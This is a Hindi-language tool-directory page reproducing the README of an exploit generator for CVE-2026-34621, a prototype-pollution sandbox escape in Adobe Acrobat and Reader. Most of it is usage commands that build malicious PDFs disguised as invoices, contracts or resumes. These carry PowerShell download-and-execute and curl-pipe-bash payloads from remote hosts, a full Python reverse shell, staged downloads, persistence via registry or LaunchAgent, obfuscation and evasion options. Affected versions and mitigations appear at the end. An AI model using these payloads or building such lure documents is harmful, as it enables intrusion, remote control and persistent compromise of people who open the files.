Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve_2026_34621_advanced — CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता, जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है। | Kitploit
उपकरण/GitHubGitHub/null200ok/cve_2026_34621_advanced
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता, जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है।

रिपॉजिटरी देखें
13645 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-34621 उन्नत एक्सप्लॉइट जनरेटर

Python 3.7+ License

CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है।

⚠️ महत्वपूर्ण अस्वीकरण
यह टूल केवल अधिकृत सुरक्षा अनुसंधान और पैठ परीक्षण के लिए है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।


📋 विषय-सूची

  • अवलोकन
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग उदाहरण
    • Windows कमांड
    • macOS कमांड
    • मोबाइल परीक्षण
  • कमांड-लाइन विकल्प
  • यह कैसे काम करता है
  • प्रभावित संस्करण
  • शमन
  • योगदान
  • लाइसेंस

  • 🔍 अवलोकन

    CVE-2026-34621 Adobe Acrobat और Reader में एक ज़ीरो-डे भेद्यता है जो हमलावर को अनुमति देती है:

    1. Adobe के इंजन के भीतर JavaScript ऑब्जेक्ट प्रोटोटाइप को प्रदूषित करना।
    2. सुरक्षा सैंडबॉक्स को बायपास करना।
    3. पीड़ित की मशीन पर मनमाना सिस्टम कमांड निष्पादित करना।

    यह जनरेटर एक दुर्भावनापूर्ण PDF फ़ाइल बनाता है जो, Adobe Reader के भेद्य संस्करण में खोले जाने पर, पीड़ित के ऑपरेटिंग सिस्टम के अनुरूप पेलोड को स्वचालित रूप से निष्पादित करता है।

    समर्थित लक्ष्य प्लेटफ़ॉर्म:

    • ✅ Windows (पूर्ण मनमाना कोड निष्पादन)
    • ✅ macOS (पूर्ण मनमाना कोड निष्पादन)
    • ❌ Android / iOS (भेद्य नहीं – केवल डेमो फ़ॉलबैक)

    ✨ विशेषताएँ

    श्रेणीक्षमताएँ
    क्रॉस‑प्लेटफ़ॉर्म पेलोडOS का स्वतः पता लगाता है और उपयुक्त Windows या macOS कमांड निष्पादन विधि का चयन करता है।
    एकाधिक निष्पादन वेक्टरcmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS)।
    स्टेज्ड पेलोडदूरस्थ URL से द्वितीय-चरण पेलोड डाउनलोड और निष्पादित करें।
    स्थिरतारजिस्ट्री Run कुंजी (Windows) या LaunchAgent (macOS) स्थापित करें।
    चोरी तकनीकJavaScript अस्पष्टता के तीन स्तर, पर्यावरण कुंजीकरण, निष्पादन विलंब, बहुरूपी कोड।
    ल्यूर PDF एम्बेडिंगएक्सप्लॉइट को वैध दिखने वाली PDF में विलय करें (PyPDF2 आवश्यक है)।
    एकाधिक ट्रिगरOpenAction, पेज-ओपन एक्शन, या दस्तावेज़-स्तरीय JavaScript।
    व्यापक रिपोर्टिंगपेलोड कॉन्फ़िगरेशन का विवरण देने वाली HTML, TXT, और JSON रिपोर्ट।

    📦 स्थापना

    1. रिपॉजिटरी क्लोन करें

    root@kitploit:~
    git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
    cd CVE-2026-34621-Exploit
    

    2. (वैकल्पिक) वर्चुअल एनवायरनमेंट बनाएं

    root@kitploit:~
    python3 -m venv venv
    source venv/bin/activate      # Linux/macOS
    venv\Scripts\activate         # Windows
    

    3. निर्भरताएँ स्थापित करें

    मुख्य स्क्रिप्ट केवल Python मानक लाइब्रेरी का उपयोग करती है। ल्यूर PDF विलय सुविधा के लिए, PyPDF2 स्थापित करें:

    root@kitploit:~
    pip install PyPDF2
    

    🚀 त्वरित प्रारंभ

    Windows और macOS दोनों पर कैलकुलेटर खोलने वाली एक बुनियादी PDF उत्पन्न करें:

    root@kitploit:~
    python3 cve_2026_34621_advanced.py -o test.pdf
    

    यह बनाता है:

    test.pdf – दुर्भावनापूर्ण PDF फ़ाइल।

    test_report.html – विस्तृत HTML रिपोर्ट।

    test_report.txt – सादा पाठ सारांश।

    test_config.json – JSON कॉन्फ़िगरेशन निर्यात।

    💻 उपयोग उदाहरण

    Windows कमांड

    1-परिदृश्य कमांड

    A-बेसिक calc.exe पॉपअप

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
    

    PowerShell रिवर्स शेल

    root@kitploit:~
    python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
    

    स्थिरता के साथ स्टेज्ड पेलोड

    root@kitploit:~
    python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
    

    पर्यावरण‑कुंजीकृत (केवल "SALES-PC" पर चलाएं)

    root@kitploit:~
    python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
    

    अस्पष्टता स्तर 2 और 10‑सेकंड विलंब के साथ

    root@kitploit:~
    python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
    

    macOS कमांड

    2-परिदृश्य कमांड

    कैलकुलेटर खोलें

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
    

    स्क्रिप्ट डाउनलोड और निष्पादित करें

    root@kitploit:~
    python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
    

    Python के माध्यम से रिवर्स शेल

    root@kitploit:~
    python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
    

    LaunchAgent के माध्यम से स्थिरता

    root@kitploit:~
    python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
    

    ल्यूर PDF में एम्बेड करना

    root@kitploit:~
    python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
    

    3-मोबाइल परीक्षण नोट

    स्क्रिप्ट स्वयं PDF उत्पन्न करने के लिए डेस्कटॉप (Windows/macOS/Linux) पर चलती है। उत्पन्न PDF को Android या iOS डिवाइस पर खोला जा सकता है, लेकिन:

    Adobe Acrobat Reader के मोबाइल संस्करण CVE-2026-34621 के लिए भेद्य नहीं हैं।

    पेलोड सिस्टम कमांड निष्पादित करने के बजाय एक हानिरहित डेमो फ़ॉलबैक (URL खोलना या अलर्ट दिखाना) ट्रिगर करेगा।

    📖 कमांड-लाइन विकल्प

    विकल्प विवरण

    -o, --output FILE आवश्यक। आउटपुट PDF फ़ाइलनाम।

    --win CMD निष्पादित करने के लिए Windows कमांड (डिफ़ॉल्ट: calc.exe)।

    --mac CMD निष्पादित करने के लिए macOS कमांड (डिफ़ॉल्ट: open /System/Applications/Calculator.app)।

    --stage URL द्वितीय-चरण पेलोड डाउनलोड करने के लिए URL।

    -p, --persistence स्थिरता तंत्र स्थापित करें (Registry/LanchAgent)।

    -O, --obfuscate LEVEL JavaScript अस्पष्टता स्तर (0=कोई नहीं, 1=बुनियादी, 2=मध्यवर्ती, 3=उन्नत)।

    -d, --delay SECONDS निष्पादन को निर्दिष्ट सेकंड के लिए विलंबित करें।

    -k, --key HOSTNAME पर्यावरण कुंजीकरण – केवल मेल खाने वाले होस्टनाम पर निष्पादित करें।

    -l, --lure PDF ल्यूर के रूप में उपयोग करने के लिए वैध PDF का पथ (एक्सप्लॉइट को विलय करता है)।

    --trigger TYPE ट्रिगर वेक्टर: openaction, pageopen, या doclevel।

    --no-reports HTML/TXT/JSON रिपोर्ट उत्पन्न करना छोड़ें।

    --seed N प्रतिलिपि योग्य बहुरूपी पीढ़ी के लिए यादृच्छिक बीज सेट करें।

    ⚙️ यह कैसे काम करता है

    हमला श्रृंखला

    प्रोटोटाइप प्रदूषण:

    एम्बेडेड JavaScript दुर्भावनापूर्ण गुण (__trusted, privileged, आदि) इंजेक्ट करने के लिए Object.prototype को संशोधित करता है। यह Adobe के JavaScript इंजन ट्रस्ट सीमा को भ्रमित करता है।

    संदर्भ वृद्धि

    प्रदूषित प्रोटोटाइप के कारण, इंजन अविश्वसनीय दस्तावेज़ JavaScript को गलत तरीके से विशेषाधिकार प्राप्त संदर्भ में चल रहा मानता है।

    विशेषाधिकार प्राप्त API पहुंच

    स्क्रिप्ट अब app.launchURL, util.readFileIntoStream, और app.trustedFunction जैसे प्रतिबंधित API को कॉल कर सकती है।

    सैंडबॉक्स एस्केप

    ये API Adobe सैंडबॉक्स के बाहर फ़ाइल सिस्टम पहुंच और प्रक्रिया निष्पादन की अनुमति देते हैं।

    मनमाना कोड निष्पादन

    स्क्रिप्ट OS-विशिष्ट विधियों का उपयोग करके हमलावर के कमांड को निष्पादित करती है:

    Windows: cmd.exe /c, PowerShell, या WScript.Shell।

    macOS: Terminal.app URL हैंडलर या osascript।

    अस्पष्टता स्तर

    स्तर विवरण

    0 कोई अस्पष्टता नहीं – सादा पठनीय JavaScript।

    1 स्ट्रिंग शाब्दिक String.fromCharCode में परिवर्तित, चर नाम यादृच्छिक।

    2 स्तर 1 + डेड कोड इंजेक्शन और जंक टिप्पणियाँ।

    3 पूरी स्क्रिप्ट base64-एन्कोडेड और eval(atob(...)) में लपेटी गई, फिर पुनः अस्पष्ट।

    🛡️ प्रभावित संस्करण

    उत्पाद ट्रैक भेद्य संस्करण पैच किया गया संस्करण

    Adobe Acrobat DC निरंतर ≤ 26.001.21367 26.001.21411

    Adobe Acrobat Reader DC निरंतर ≤ 26.001.21367 26.001.21411

    Adobe Acrobat 2024 क्लासिक ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)

    🛠️ शमन

    तुरंत अपडेट करें: Adobe से नवीनतम सुरक्षा अपडेट लागू करें।

    Adobe Reader में JavaScript अक्षम करें: Edit → Preferences → JavaScript → "Enable Acrobat JavaScript" अनचेक करें (ध्यान दें: यह कुछ PDF कार्यक्षमता को तोड़ता है)।

    वैकल्पिक PDF व्यूअर का उपयोग करें: ब्राउज़र या तृतीय-पक्ष व्यूअर का उपयोग करने पर विचार करें जो प्रभावित नहीं हैं।

    🤝 योगदान

    योगदान का स्वागत है, लेकिन कृपया ध्यान दें:

    सभी पुल अनुरोध रक्षात्मक अनुसंधान, पहचान सुधार, या रिपोर्टिंग संवर्द्धन के लिए होने चाहिए।

    हम ऐसे योगदान स्वीकार नहीं करते हैं जो वैध परीक्षण के लिए आवश्यक से अधिक टूल की आक्रामक क्षमता बढ़ाते हैं।

    योगदान करने के लिए:

    रिपॉजिटरी को फोर्क करें।

    एक फीचर ब्रांच बनाएं।

    परिवर्तनों के स्पष्ट विवरण के साथ पुल अनुरोध सबमिट करें।

    📄 लाइसेंस

    यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

    इस सॉफ़्टवेयर का उपयोग करके, आप सहमत हैं कि सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए आप जिम्मेदार हैं।

    लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए सभी दायित्व को अस्वीकार करता है।

    टूल डाउनलोड करें